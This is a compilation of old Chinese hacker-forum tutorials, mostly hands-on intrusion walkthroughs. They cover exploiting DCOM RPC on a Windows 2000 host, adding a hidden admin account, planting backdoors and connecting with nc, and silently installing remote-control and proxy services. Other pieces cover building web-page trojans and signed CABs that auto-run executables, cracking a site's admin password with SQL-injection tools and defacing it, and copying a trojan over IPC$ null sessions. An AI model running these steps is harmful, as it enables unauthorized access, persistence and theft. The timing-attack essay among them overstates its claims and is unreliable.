星语心愿

声明：本人菜鸟的一些菜鸟经验，还请大虾指点
一步一步的入侵----only for you

（声明：本人菜鸟的一些菜鸟经验，还请大虾指点）

大家好，现在网上很流行dcomrpc，哈哈，那好就说说利用dcomrpc入侵。很入侵之后做的事情

需要的工具：
很好的：radmin.exe
扫描工具: retinarpcdcom.exe
溢出攻击工具:RpcDcom（通用溢出工具)
脚本开启telnet工具：telnet.vbe opentelnet.exe resumetelnet.exe
代理：sksockserver.exe
后门程序：WinEggDropShellPro3thVersion

好了，该做的都做的差不多了。现在开始把~~

首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子，这个漏洞需要135端口开放，（想必

随便扫一下就会发现有许多主机开放的135端口）。。。。。。

(人走运座着都能检到钱) 211.217.50.xx第一个主机就被扫出来又此漏洞。开始工作

看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有
其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k

哈哈，是win2k server版本


展开命令行：

[查看dcomrpc的用法用法 dcomrpc -d <host> [options] ]

F:\hack>cd rpc\dcomrpc

RPC DCOM Expl01t coded by .:[oc192.us]:. Security

Complied and Modified by Expl01t www.longker.com

Usage:

dcomrpc -d <host> [options]
Options:
  -d:Hostname to attack [Required]
  -t:Type [Default: 0]
  -r:Return address [Default: Selected from target]
  -p:Attack port [Default: 135]
  -l:Bindshell port [Default: 666]

Types:
  0 [0x0018759f]: [Win2k-Universal]
  1 [0x0100139d]: [WinXP-Universal]


开始进行溢出：
F:\hack>cd rpc\dcomrpc -d211.217.50.xx 0

RPC DCOM remote expl01t - .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[+] Resolving host..
[+] Done.
[+] Expl01ting....Just wait......

等到出现，说明溢出成功
c:\winnt\system32>

接着我们建立用户

c:\winnt\system32>net user blueye$ 1111 /add
命令成功完成。

把用户添加成超级管理员
c:\winnt\system32>net localgroup administrators blueye$ /add
命令成功完成。


看看共享开了没有,没有的话把共享开开

c:\winnt\system32>net share
清单是空的。

c:\winnt\system32>net share ipc$
命令成功完成。
c:\winnt\system32>net share admin$
命令成功完成。

到这里我们入侵告一段落


[ 建 立 IPC$ 连 接 ，也可以使用tftp上传 ，先和对方建立连接]

F:\hack>net use \\211.217.50.xx\ipc$ "1111" /user:blueye$

[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]

F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32

F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32

然后运行后门程序，我们可以使用at命令。但是有的机器把at明令禁止了，建议直接开起telnet
使用opentelnet.exe 关闭开启的telnet使用resumetelnet \\ip user password
如果忘记开共享可以使用脚本开启telnet来开共享，用法:
cscript telnet.vbe ip user password null port (null是验证方式)

F:\hack>opentenet \\211.217.50.xx blueye$ 1111 1 4567

F:\hack>telnet 211.217.50.xx 4567
省略...

连接并运行后门程序,运行后门程序命令根目录：inject.exe -run
（后门使用方法和安装都在zip文件里面包含了）

后门端口123456
F:\hack>nc 211.217.50.xx 123456


 Welcome To WinEggDropShell Matrix Version

[Melody
]#



下面安装radmin

配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章
radmin.reg
raddrv.dll
admdll.dll
r_server.exe

把这个4个文件copy c:\winnt\system32

在目录下面执行命令
c:\winnt\system32>r_server /s radmin.reg -----导入注册表

c:\winnt\system32>r_server /install /silence -----安装radmin.并且不显示托盘

c:\winnt\system32>net start r_server----- 启动服务


可以开启3389的话你自己看着办把，哈哈


安装sock代理
把sksockserver.exe copy c:\winnt\system32

c:\winnt\system32>sksockserver /install-----安装服务

c:\winnt\system32>sksockserver -config port 1234----端口定在1234自己可以改

c:\winnt\system32>sksockserver -config starttype 2----开机自动启动

c:\winnt\system32>net start skserver ----启动服务



最后删除共享
net share ipc$ /del
net share admin$ /del




在安装radmin的时候你发现有人已经安装了。。怎么办？走人？--------NO


看操作 (我输入的内容)

后门连接

F:\hack>nc 211.217.50.xx 123456


 Welcome To WinEggDropShell Matrix Version

[Melody
]#（pslist）

[Melody
]#(pskill r_server)

[Melody
]#(shell)

c:\winnt\system32>(del r_server.exe)

c:\winnt\system32>(del admdll.dll)

c:\winnt\system32>(del raddrv.dll)


copy你自己的上去，然后安装

省事的办法直接导入注册表，然后重新输入安装命令运行，就可以了，只是在原来默认端口上面架上了密

码


等等。。。。为什么我输入导入注册表命令不管用呢？出现什么regedit不是可运行的程序之类的 。

完了，努力白费了。。。。。。。 -----------------------------NO

出现这样的情况最简单的解决办法telnet上去导入试试看，什么？不是把，有没有搞错阿。。。

呵呵，尽管放心，去试试看就知道；还可以先运行radmin 然后在radmin的dos下导入，也是可以的

嗬嗬，去试试看吧


防御办法：
安装rpc补丁
使用防火墙过滤135，445，139等端口


完全菜鸟级别，高手莫见怪，恳求高手指导

QQ：5024786

山东省枣庄市山东薛城实验中学 微机组 277000(邮编)
姓名：韦红高 信箱：fenghuangsan@163.com 

 
很多人都向往做黑客，黑客的很多工作其实都是破解密码，当然是别人的。本文纯粹是从理论上论证任何密码在有限时间的可破解性。如果我告诉你这样的事实："Win2000的任意20位以内的密码最多也只需要2小时就可以破解"，你一定惊讶地当场吐血，对我怒目相向。下面看我的论述。
  任何破解密码的行为都可以归结到一个模型，适用于远程破解还是本地破解。本理论基于穷解法+做任何事情都要花费时间这样一个事实。下面建立模型：(这里把时间放大)有一间房子，房子的门用一台计算机控制，在门外安装类似于银行里面使用的密码输入器。因为一个密码的正确性必须通过比较来验证，现在假设对于每一个单个密码(A-C和B-C所用时间相等)的比较时间相同，用s表示；置位时间也相同，用T表示。密码由0，1，2，...，9这十个数的任意组合，假定密码是：874936。为了使实验具有可行性，主要是指人眼可以测定，不妨设s=5秒，T=10秒，密码错误返回F，正确则把门打开。
  开始工作：让一个实验者站在门外，我们排除其它非主要因素。比较密码一位一位的比较：如比较ABCD与edfc是否相同，是用A与e相比，再用B与d相比，以此类推。现在给出计算机对于密码验证的两种机制：机制（1）初始化flag=1，如果遇到有一位不等，则flag=0，一旦flag=0，则立即返回F，后面的将不再比较，否则最终打开门；机制（2）初始化flag=0，用所给密码与正确密码一位一位比较，相等则不置位，只要有一位不相等flag变成1，以后的只比较而不置位，最后看flag=1则不开门，返回F，flag=0，则开门。
 如果仔细研究计算机的工作原理，或者很多程序的工作原理基本上都是以上两种方式，而且第一种机制居多。我们还是从实际上出发研究看看其中有什么缺限可以利用。

8-0：s；flag=0：T ;t=s+T=15秒：F
以上写法表示用0来尝试。8与0比较用时s，置位用时T，总用时为s+T，其值为5+10=15秒。以下写法以此类推。

8-1：s；flag=0：T ；t=s+T=15秒：F
......（从0到7)
8-8：s；不置位； t=s=5秒：F

发现当用8来尝试时，计算机在t=s=5秒钟就返回F。而其它的用时都是s+t=15秒（包括用9来尝试，在这不写出来，只要发现用时不一样就停止，以下同。）可以断定正确密码的第一位就是8，因而取定第一位为8。第二步用两位密码来尝试。

8-8：s；7-0：s；flag=0：T；t=2s+t=20秒：F
......(从0到6)
8-8：s；7-7：s；不置位；t=2s=10秒：F
可以取定密码的第二位为7。

8-8：s；7-7：s；4-0：s；flag=0：T；t=3s+T=25秒：F
......（从0到3)
8-8：s；7-7：s；4-4：s；不置位；t=3s=15秒：F
可以取定密码的第三位为4。

8-8：s；7-7：s；4-0：s；9-0：s；flag=0：T；t=4s+T=30秒：F
......（从0到8)
8-8：s；7-7：s；4-4：s；9-9：s；不置位；t=4s=20秒：F
可以取定密码的第四位为9。

8-8：s；7-7：s；4-0：s；9-0：s；3-0：s；flag=0：T；t=5s+T=35秒：F
......（从0到2)
8-8：s；7-7：s；4-4：s；9-9：s；3-3：s；不置位；t=5s=25秒：F
可以取定密码的第五位为3。

8-8：s；7-7：s；4-0：s；9-0：s；3-0：s；6-0：s；flag=0：T；t=6s+T=40秒：F
......（从0到5)
8-8：s；7-7：s；4-4：s；9-9：s；3-3：s；6-6：0；不置位；t=5s=30秒：T(开门)
可以取定密码的第六位为6。

我们再回过头来看看整个过程用多少时间：
定8 ：(8×15+5)=125 注意是8×而不是7×，因为是从0到7，是8个数，以下同。
定7 ：(7×20+10)=150
定4 ：(4×25+15)=115
定9 ：(9×30+20)=290
定3 ：(3×35+25)=130
定6 ：(6×40+30)=270
总用时为：(8×15+5)+(7×20+10)+(4×25+15)+(9×30+20)+(3×35+25)+(6×40+30)=1080
即1080秒=18分
  奇妙吧，只用18分钟就破解了一位6位密码，再看一看6位的最大用时为多少，即当密码是999999时用时最多：(9×15+5)+(9×20+10)+(9×25+15)+(9×30+20)+(9×35+25)+(9×40+30)=(140)+(190)+(240)+(290)+(340)+(390)=1590秒=26.5分。
  这只是假定的s和T比较大的情况，实际问题都是s和T是比较小的，可能就是几个时钟周期。我们在这把时间放大就在于使时间具有人眼可测量性，如果在计算机上能精确测量任意两个时间的差，所有的密码都可能在很短的时间内破解。
  为什么有人说6位以上的密码就很难破解呢？因为他只是从穷解法上考虑的，就是说，即使只用0，1，2，...，9做密码，6位的所有排列为10×10×10×10×10×10它是10的6次方。我们可以做一个比较直观的比较，如果每一次密码的尝试用时1秒，最大用时为：10×10×10×10×10×10/3600≈277年时间，我想你一般情况下是等不了277年的时间来看密码的结果的。而用我们以上的方法最大用时为：10+10+10+10+10+10=60秒，一分钟搞定。我们发现居然有天壤之别，即使使用计算机键盘上的字符来做密码，假定能使用300个字符（因为计算机的键盘只有一百多个键），最多用时为：300×6=30分钟。8位密码用时为：300×8=40分钟。20位密码用时为：300×20=100分钟。
怎么样？Win2000如果用机制(1)比较密码的话，是不是轻松搞定？
  我们再看使用机制(2)能不能破解。还是以我们以上的模型来研究，我们只需比较一位密码，看时间上有什么区别：
  因为密码为6位(874936)，所以不足6位可以假定计算机用一个NULL，即空值来比较。
8-0：s；flag=1：T；7-NULL：s；4-NULL：s；9-NULL：s；3-NULL：s；6-NULL：s；t=6s+T：F
8-1：s；flag=1：T；7-NULL：s；4-NULL：s；9-NULL：s；3-NULL：s；6-NULL：s；t=6s+T：F
8-2：s；flag=1：T；7-NULL：s；4-NULL：s；9-NULL：s；3-NULL：s；6-NULL：s；t=6s+T：F
8-3：s；flag=1：T；7-NULL：s；4-NULL：s；9-NULL：s；3-NULL：s；6-NULL：s；t=6s+T：F
8-4：s；flag=1：T；7-NULL：s；4-NULL：s；9-NULL：s；3-NULL：s；6-NULL：s；t=6s+T：F
8-5：s；flag=1：T；7-NULL：s；4-NULL：s；9-NULL：s；3-NULL：s；6-NULL：s；t=6s+T：F
8-6：s；flag=1：T；7-NULL：s；4-NULL：s；9-NULL：s；3-NULL：s；6-NULL：s；t=6s+T：F
8-7：s；flag=1：T；7-NULL：s；4-NULL：s；9-NULL：s；3-NULL：s；6-NULL：s；t=6s+T：F

8-8：s；不置位；7-NULL：s；4-NULL：s；9-NULL：s；3-NULL：s；6-NULL：s；t=6s：F

8-9：s；flag=1：T；7-NULL：s；4-NULL：s；9-NULL：s；3-NULL：s；6-NULL：s；t=6s+T：F
  可以看出来：用8来尝试时，时间比其它所用的时间少。因而第一位可以断定为8，事实上说明这种情况也是可以破解的。
  事实上，计算机在比较密码的情况基本上都是以上两种情况。还有什么奇偶校验或者标志位的奇偶校验等，我想对于正确密码和错误密码的比较在时间都一定存在差别。就像我随便给一个数给你8293487879(8294387879，8293487879)，你从肉眼发现8293487879：8294387879比较所用时间与8293487879：8293487879比较所用时间不一样。
  因为Win2000的用户名很容易得到，只要拿到密码就可以完全控制win2000，本人现在只是从理论上论证了密码的可破解性，如果从实践上也可以实现的话，我想从此将结束win2000时代。欢迎大家从实践上去验证，或者对作者的论述提出疑义。作者的信箱：fenghuangsan@163.com。（千万别用彼之矛攻彼之盾。）读者可能问作者为什么不自己去验证，因为我没有时间，懒得理你。

要知道"大虾走门，菜鸟走窗"我说的。我是个菜菜鸟所以我知道这一
点，我是靠送别人礼物让她开窗来完成进入她家的。不像那些大虾直接进出
不用送东东，我有QQ发给"好友"带木的照片来完成进入，再由她机器收到
的QQ在发...
要知道"大虾走门，菜鸟走窗"我说的。我是个菜菜鸟所以我知道这一
点，我是靠送别人礼物让她开窗来完成进入她家的。不像那些大虾直接进出
不用送东东，我有QQ发给"好友"带木的照片来完成进入，再由她机器收到
的QQ在发... 好累!有了些成就好像最多时有30多个肉鸡，但免费的空间要收
费了(免费餐不多了)几个星期的心血白费。主要是没有时间，还好上黑白上
看到了网页木马-图片木马，对我这样的菜鸟来说就是个天大的好事，放到网
页上成功。什么还有EML头啊太好了不用自己动手全搞定。时之不常我的肉鸡
又由多变少了为什么呢!到网吧一试才知道这全过时了，网吧装了金山防火和
还原精灵，一上网页就杀之!怎么办只有自己动手了!
 
(一)首先我想了想自己知道的网页木马的优点和不足：
 
 一，JS.Exception.EXploit
  "雪峰，我的首页被改，桌面被..."QQ上的好友向我求救，"老大，和
 你学了这么多年电脑怎么还在网虫的页上被黑，告诉你上黑白上学学吧
  要不千万别上菜鸟页上玩，要不会死的"

 二，EML头
 "小弟前些天给我的QQ全没了"，"黑鸟大哥十几个全没了不会吧是不
  是你的机器..."打车前去看了看，发现TEMP里有个EXE名为QQpass这不
  是收QQ的东东，虽没用过非它不过了。"大哥，你常写信吗""不啊，
 为什么会被偷呢，我有防火墙呀是新买的""不要让我来教你吧，你可
 是我的老师，亡羊补牢你不知道吗？防是在发毒发之后不多说了，你要
  不打个补丁，要不就卸了收信程序吧"

  三，iframe
  漏洞也不太会用，但看介绍还好用。
 
  四，.EXE to .BMP +JS.Exception.EXploit
  这就是图片木马吧，但我不喜欢JS，这种网虫页里的东东防火墙叫个不
  停，还会驱走很多访客，黑下注册表肯定也会被人改回的，而后的.VBS
  还会有什么用呢，它是在下次开机才运行的。但我喜欢做这个.BMP的那
  个老师，原理是好的。(下面我用到了)

  *五，通过安全认证的CAB， COX
 这使我这个菜菜鸟无能为力，百分百中招了，试求哪位大虾也帮我把我
 的文件上签个微软的大名要年头长些的，要不老过期。
 
  (在黑白上没看到这个源码，所以自己改过加上)
 　原理：IE读文件时会有文件读不出，就会去"升级"这样它会在网页中指定的位置找 .cab
 并在系统里写入个CID读入　.cab 里的文件。
 方法：.cab是WINDOWS里的压缩文件，我们知道IE里所用的安全文件是用签名的CAB也不例
　　　　　外，所做的CAB是经过安全使用证书异入的。也就是说IE认证攻击，只所以每次都能
　　　　　入侵我的脑，是因为它通过的是IE认证下的安全攻击，这样不管我怎么做都没办法。
　　制做方法：因本人水平有限（参）
　　　　　　软件：1.安全证书管理。　　2.CAB压缩或安装盘制做
　　　　先到，IE里找安全-内容，里面有证书，我们找一个就行。导出　*.CER
　　　　在用证书管理打开*.CER　导出证书.SPC和密钥.PVK。
　　　　这样我们就可以做　.cab 了。
　　　　做一个setup.inf
  [Setup Hooks]
 hook1=hook1
 [hook1]
 run=%EXTRACT_DIR%\文件.exe

 [Version]
 Signature=$CHICAGO$
 AdvancedInf=2.0

　　　　最重要我所用的是安装盘制做，ADD　sdtup.inf OR文件.exe
  然后　导入证书.SPC和密钥.PVK。
 实例在我的免费空间上不过下载的是成人拔号器千万别点
  (合法的签名)是安全的
  http://jzs.3322.net/live/index.html
 
 六，VBScript
 我想这是很多病毒最爱用的了不用多说吧网页和文件常用的语言。
 
 七，综合所感优点组合
 iframe 成两个窗，其一为.BMP+VBScript
  其二为EML头的变种.mht(真对打了打补丁的不会做，可以用网页合并器合成)
 实例没试过成功的话在桌面上多个"女友????????????爱????????????你?
 ??????????.EXE"文件加长为的是不要她看到EXE。晕!图标没改以后在说。
 网址 http://jzs.3322.net/inbb.htm
 

  总，试我的方法在自己机器上运行成功，只因时间有限源码没转成BMP，你可以
  自己转下，黑白上有不多说。我做的源码里没加RUN "文件路径"，如果加了
  就可以自动运行没有问题，对于网吧的还原精灵吗，有个还原精灵清除器很好用的。
(二)想像与求助
 八，运用ASP因为它内置了VBS
 我想的不知道是不可行，因VBS功能很强大，但ASP内的VBS和文件里的有些
 差别不能放之就用，我又菜希望有人帮，自己做的可以改自己的注册表，但
 改别人的没试成(是不是我用的是自己的服务器呢别人的ASP空间不开脚本)
 大虾帮我写个文章<<ASP做网页木马>>
 九，运用Flash的动作VBS
 看过6.0里好像可以但不太会，我想可行，如果帮我写我先谢了!
 十，以避防火，可以改下欢乐时光的源码
 这个不多说，您可能听过它是病毒了，它不比ActiveX，JS还可以碰到注册表
 那只不过是个脚本吗，欢乐时光是病毒防火全防在外的，没办法改改吧，谁让
 它用的原理好呢，我试过把它的13号发做删了(太毒了)但防火还防。如果大虾
 可以帮我上网下个源码吧，要不找我雪峰要也行我把写过的放到文尾。注意呀
 不要在自己的机器上试呀，我试了传染的几秒的事，整个系统呀，手工杀了我
 半个多小时，我没杀的软件。
 源文件：


以上所有的知识全来自黑白网，只是在我运行时做了些评，不要说我太菜没办法只有初中
水平。入网很早了也在网络里很老了，网吧里多叫我叔叔了,但网络知识不高但很想学，从
空手入证券公司数据到现在学做网页，全有一种感想吧!如果你想入证券公司找我吧我会帮
你对于学过DOS的我以证券室里的电脑还玩的转(公司里的网管是DOS白痴)，不象在这大千
网络面对VB等新东东，不会的太多，希望高手的帮助!

作者：雪峰

作者：lake2　　来自：blog.csdn.net/lake2">http://blog.csdn.net/lake2


说到url编码，你或许会想起N年前的url编码漏洞。可惜我是"生不逢时"啊，我接触网络时，那个漏洞早就绝迹咯。

言归正传，URL 编码是什么东东呢？看看我从网上抄的定义：

引用:

url编码是一种浏览器用来打包表单输入的格式。浏览器从表单中获取所有的name和其中的值 ，将它们以name/value参数编码（移去那些不能传送的字符, 将数据排行等等）作为URL的一部分或者分离地发给服务器。不管哪种情况, 在服务器端的表单输入格式样子象这样:

theName=Ichabod+Crane&gender=male&status=missing&headless=yes

URL编码遵循下列规则: 每对name/value由&符分开；每对来自表单的name/value由=符分开。如果用户没有输入值给这个name，那么这个name还是出现，只是无值。任何特殊的字符（就是那些不是简单的七位ASCII，如汉字）将以百分符%用十六进制编码，当然也包括象 =, &, 和 % 这些特殊的字符。


呵呵，明白了吧，其实url编码就是一个字符ascii码的十六进制。不过稍微有些变动，需要在前面加上"%"。比如"\"，它的ascii码是92，92的十六进制是5c，所以"\"的url编码就是%5c。那么汉字的url编码呢？很简单，看例子："胡"的ascii码是-17670，十六进制是BAFA，url编码是"%BA%FA"。呵呵，知道怎么转换的了吧。

URL编码平时我们是用不到的，因为IE会自动将你输入到地址栏的非数字字母转换为url编码。所以对于浏览器来说http://blog.csdn.net/l%61ke2与http://blog.csdn.net/lake2是等效的（注意，第一个url我用%61替换了a）。呵呵，或许你已经想起了，有人提出数据库名字里带上"#"以防止被下载，因为IE遇到#就会忽略后面的字母。破解方法很简单——用url编码%23替换掉#。我本来企图利用url编码来躲过注射检查的，不过失败了，因为服务器端会将url编码转换成字符的。

等等，好像跑题了啊，呵呵，不好意思：）

现在SQL注射非常流行，所以就有人写了一些防注射的脚本。当然啦，思路不一样，效果大不同。各位看官请看下面的××SQL通用防注入asp版部分代码。

Fy_Url=Request.ServerVariables("QUERY_STRING")
Fy_a=split(Fy_Url,"&")
redim Fy_Cs(ubound(Fy_a))
On Error Resume Next
for Fy_x=0 to ubound(Fy_a)
Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)
Next
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 then
Response.Write "出现错误！"
Response.End
End If
End If
Next


它的思路就是先获得提交的数据，以"&"为分界获得并处理name/value组，然后判断value里是否含有定义的关键字（这里为求简便，我只留下了"and"），有之，则为注射。

乍一看去，value被检查了，似乎没有问题。呵呵，是的，value不会有问题，可是，name呢？

它的name/value组值来自于Request.ServerVariables("QUERY_STRING")，呵呵，不好意思，这里出问题了。Request.ServerVariables("QUERY_STRING")是得到客户端提交的字符串，这里并不会自动转换url编码，哈哈，如果我们把name进行url编码再提交的话，呵呵，那就可以绕过检查了。比如参数是ph4nt0m=lake2 and lis0，此时程序能够检测到；如果提交%50h4nt0m=lake2 and lis0（对p进行url编码），程序就会去判断%50h4nt0m的值，而%50h4nt0m会被转换为ph4nt0m，所以%50h4nt0m值为空，于是就绕过了检测。

等等，为什么既然name不解码可以绕过检查而value就不能绕过呢？因为value的值取自Request(Fy_Cs(Fy_x))，这个服务器就会解码的。

程序怎么改进呢？只要能够得到客户端提交的数据是解码后的就可以了，把得到name的语句改为For Each SubmitName In Request.QueryString就可以了。

呵呵，谢谢阁下耐着性子看完我的文章^_^

2分钟入侵网站全程实录


说起流光、溯雪、乱刀，可以说是大名鼎鼎无人不知无人不晓，这些都是小榕哥的作品。每次一提起小榕哥来，我的崇拜景仰就如滔滔江水，连绵不绝~~~~（又来了！） 让我们崇拜的小榕哥最新又发布了SQL注入工具，这回喜欢利用SQL注入入侵网站的黑友们有福了。小榕哥的工具就是强！偶用它来搞定我们本地的信息港，从寻找注入漏洞到注入攻击成功，通过准确计时，总共只用了3分还差40秒，呵呵，王者风范，就是强啊！不信吗？看看我的入侵过程吧。
　　一、下载榕哥的工具包
　　小榕哥的这个SQL注入攻击工具包在榕哥的站点http://www.netxeyes.com/main.html可以下载到，不过这个工具太火爆了，下载的人实在太多，你觉得慢的话，可以到其它大的黑软站点搜索一下，绝对可以找到的。
　　下载来的这个工具包中总有两个小程序："wed.exe"和"wis.exe"，其中"wis.exe"是用来扫描某个站点中是否存在SQL注入漏洞的；"wed.exe"则是用来破解SQL注入用户名密码的。两个工具的使用都非常简单，结合起来，就可以完成从寻找注入点到注入攻击完成的整个过程。

　　二、寻找SQL注入点
　　"wis.exe"使用的格式如下："wis.exe 网址"，这里以笔者检测本地信息港为例：首先打开命令提示窗口，输入如下命令："wis.exe http://www.as.***.cn/"（如图1）。

　　小提示：在输入网址时，前面的"http://"和最后面的"/"是必不可少的，否则将会提示无法进行扫描。

　　输入完毕后回车，即可开始进行扫描了。很快得到了扫描结果，可以看到这个网站中存在着很多SQL注入漏洞（如图2），我们随便挑其中一个来做试验，就挑"/rjz/sort.asp?classid=1"吧。

　　打开浏览器，在地址栏中输入"http://www.as.***.cn/rjz/sort.asp?classid=1"，打开了网站页面，呵呵，原来是一个下载网页（如图3）。现在来对它进行SQL注入，破解出管理员的帐号来吧！


　　三、SQL注入破解管理员帐号
　　现在进入命令窗口中，使用刚才下载的工具包中的"wed.exe"程序，命令使用格式为："wed.exe 网址"输入如下命令："wed.exe http://www.as.***.cn/rjz/sort.asp?classid=1"。回车后可看到命令运行情况（如图4）。


　　小提示：这次输入网址时，最后面千万不要加上那个"/"，但前面的"http://"头也还是必不可少的。

　　可以看到程序自动打开了工具包中的几个文件，"C:\wed\wed\TableName.dic"、"C:\wed\wed\UserField.dic"和"C:\wed\wed\PassField.dic"，这几个文件分别是用来破解用户数据库中的字表名、用户名和用户密码所需的字典文件。当然我们也可以用其它的工具来生成字典文件，不过想想小榕哥以前出的"黑客字典"那么的强大，还用得着去多此一举吗？
　　在破解过程中还可以看到"SQL Injection Detected."的字符串字样，表示程序还会对需要注入破解的网站进行一次检测，看看是否存在SQL注入漏洞，成功后才开始猜测用户名。
　　开始等待吧！呵呵，很快就获得了数据库表名"admin"，然后得到用户表名和字长，为"username"和"6"；再检测到密码表名和字长，为"password"和"8"（如图5）。看来用户的密码还起得挺长的呢，如果手工破解出这个用户密码来，一定要花上不少时间的！

　　正想着手工注入会有多困难时，"wed.exe"程序已经开始了用户名和密码的破解。很快的，就得到了用户名和密码了——"admina"、"pbk&7*8r"（如图6）！天啦，这也太容易了吧！还不到一分钟呢！



　　四、搜索隐藏的管理登录页面
　　重新回到刚才的软件下载页面中，任意点击了一个软件下载链接，哎呀？怎么可以随便下载的呢！不像以前碰到的收费网站，要输入用户名和密码才可以下载。看来这是免费下载的网站，我猜错了攻击对象，不过既然都来了，就看看有没有什么可利用的吧？
　　拿到了管理员的帐号，现在看来我们只有找到管理员登录管理的入口才行了。在网页上找遍了也没有看到什么管理员的入口链接，看来还是得让榕哥出手啦！
　　再次拿出"wis.exe"程序，这个程序除了可以扫描出网站中存在的所有SQL注入点外，还可以找到隐藏的管理员登录页面。在命令窗口中输入"wis.exe http://www.as.***.cn/rjz/sort.asp?classid=1/ /a"（如图7）。注意这里输入了一个隐藏的参数"/a"。

　　怎么会扫描不成功呢？呵呵，原来这是扫描注入点，当然不能成功了，管理员登录页面只可能隐藏在整个网站的某个路径下。于是输入"wis.exe http://www.as.***.cn/ /a"，对整个网站进行扫描。注意扫描语句中网址的格式。程序开始对网站中的登录页面进行扫描，在扫描过程中，找到的隐藏登录页面会在屏幕上以红色进行显示。很快就查找完了，在最后以列表显示在命令窗口中。可以看到列表中有多个以"/rjz/"开头的登录页面网址，包括"/rjz/gl/manage.asp"、"/rjz/gl/login.asp"、"/rjz/gl/admin1.asp"等。就挑"/rjz/gl/admin1.asp"吧，反正这些都是管理员登录的页面想用哪个都可以。
　　在浏览器中输入网址" http://www.as.***.cn/rjz/gl/admin1.asp"，呵呵，出现了本来隐藏着的管理员登录页面（如图8）。输入用户名和密码，就进入到后台管理系统，进来了做些什么呢？当然不能搞破坏啦，看到有一个添加公告的地方，好啊，就在这儿给管理员留下一点小小的通知吧！

　　看看最后我更改过的主页，冰河洗剑的大名留在了信息港上，不过可没有破坏什么东西啊！我和网页管理员也是朋友，他会原谅我这个小小的玩笑吧！？

我真的被黑了，很惨的那种！文件被人删得一干二净，里面有很多的MM联系方式和照片，同时又被人戏弄一番，气死我了！基本过程是这样的...
我真的被黑了，很惨的那种！文件被人删得一干二净，里面有很多的MM联系方式和照片，同时又被人戏弄一番，气死我了！基本过程是这样的，是这样的，是这样的（注：这是回音，万一日记被公开出版会增加稿费，又教你一招！我都说我比猴都尖吧）：
当时是下午，我正在上网学习联众游戏的基础知识，突然我的屏幕右下方无端多出一个小图标，还提示了一堆鸟语。我当时也没在意，心想最多也就是3721搞的什么垃圾提示之类的。随之而来的便是硬盘一顿狂响，我开始有点警觉了，但是由于找不到问题来源，也就不了了之了。再后来问题就大了，我的鼠标开始自己移动。天知道鼠标想干什么？难不成电脑要自己关机？我心想大概使用时间长了，它累了。哪知道鼠标向我的QQ移动过去（当时我的QQ开着，正和网上的女同烫止掖笫拢朔乐贡鹑寺壹游遥野裃Q最小化了，每次用快捷键呼出，我比猴尖吧），然后右下脚的企鹅图标被双击后，QQ弹出来了，接着我的桌面上就出现了一个名为"必看"的文本文件。我用我刚刚升级的正版杀毒软件查了一遍才打开看（由此证明我真的很尖），里面写着一些挑衅的话，声称要格式化我的电脑！我当时很紧张，想打110，后来因为怕占线没打。想到我有正版杀毒软件的保护，还怕他不成？于是我把他写下的文本文件的内容改成"我不怕你！"，估计他是看见了，然后......然后......我就坐在这里写这篇日记了。55555～
我痛定思痛，决定找杀毒软件厂商算账去。后来一转念，人家在北京呢，哪有空理我啊！怎么办？哼，我也去学黑客知识！
我在技术论坛里发了帖子，人家告诉我那叫IPC漏洞，IPC就是Internet Process Connection的缩写，也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能，特点是在同一时间内，两个IP之间只允许建立一个连接。我之所以被黑就是因为这个漏洞。我马上开始学习IPC相关知识，准备黑一个试试（我一点都不坏，真的），功夫不负有心人啊！用了很长时间我才知道了IPC入侵的一般方法，下面写出来，省得以后被黑了都不知道是怎么回事。

如何找到具有IPC漏洞的主机呢？论坛上的人说了很多我没听过的软件，有一个软件很多人评价不错，叫"WinNT自动攻击机"，我就下载了一个。打开看一看，界面是这样的（如图1）。这么多功能啊！怎么用呢？其实我们能用到的功能很少，只用它来扫描就可以了。具体方法是选择图2所示的部分，点选"列出所有密码简单的管理账号"，然后在左边的IP范围内输入要查找的IP范围，比如我写的220.201.68.1到220.201.68.254（如图3）。最后点击"开始"就可以了。这个过程就是要找到使用Win2000系统、而且是管理员口令设置非常简单的电脑。经过查找我真找到一个主机（如图4），这台电脑把"Administrator"作为管理员名称，密码是空的，也就是图中小括号中的部分。怪不得我会被黑呢，我当时就没设密码，原来找一个笨蛋这么容易啊！

下面我们要用的软件是"DameWare Mini Remote Control"。这个软件功能类似于木马，并且是Windows"同意"的木马。启动"DameWare Mini Remote Control"，会出现如图5的界面，这时我们按照图5的输入方式输入对方的IP和用户名，点击"CONNECT"进行连接，稍等几秒会有反馈信息（如图6）。这个信息是告诉你，对方没有安装相应的远程控制服务端，问你要不要安装。当然安装了，但是不要立即点"OK"，要设置一下。点"Stall Options"，出现图7对话框，接着点"Edit"出现图8对话框。把图8中的已勾选的那项取消，这样做是为了不让对方知道你连接到他的电脑上。看来黑我的人还不够厉害，居然让我这边出现提示！呵呵！

　　都准备好了之后点"OK"就开始安装（如图9）。这个安装不用你干预，而且不会问对方同意不同意。好像已经连上了，图10就是对方的电脑桌面。怎么样，和看自己的电脑感觉一样吧？你还可以在上面运行软件，操作方法和本机完全一样，真是恐怖！这个电脑上也安装了最新版本的杀毒软件哦，可惜对我这个软件没有作用，因为它不是病毒嘛！

我这样明目张胆的用他的电脑当然不行，人家下线了就没法玩了，所以不要在这个界面里行动。进入命令行方式，给他安装一个小木马吧！
　　输入命令：
　　C:\>net use \\220.201.68.239\ipc$ "" /user:"Administrator"
　　其中的IP地址写我们的成果。IPC$后面的双引号里是密码，当然他设为空了，所以我们写空；再后来的Administrator就是用户名了。
现在，我们成功地连接到他的电脑（如图11），然后就是给他发木马了。给他什么木马呢？冰河？当然不行了，这么老的东西，杀毒软件能放过吗？有人建议使用"黑暗天使"，这个小东西比较新，成功率比较高。
输入命令：
C:\>copy 1.exe \\220.201.68.239\d$
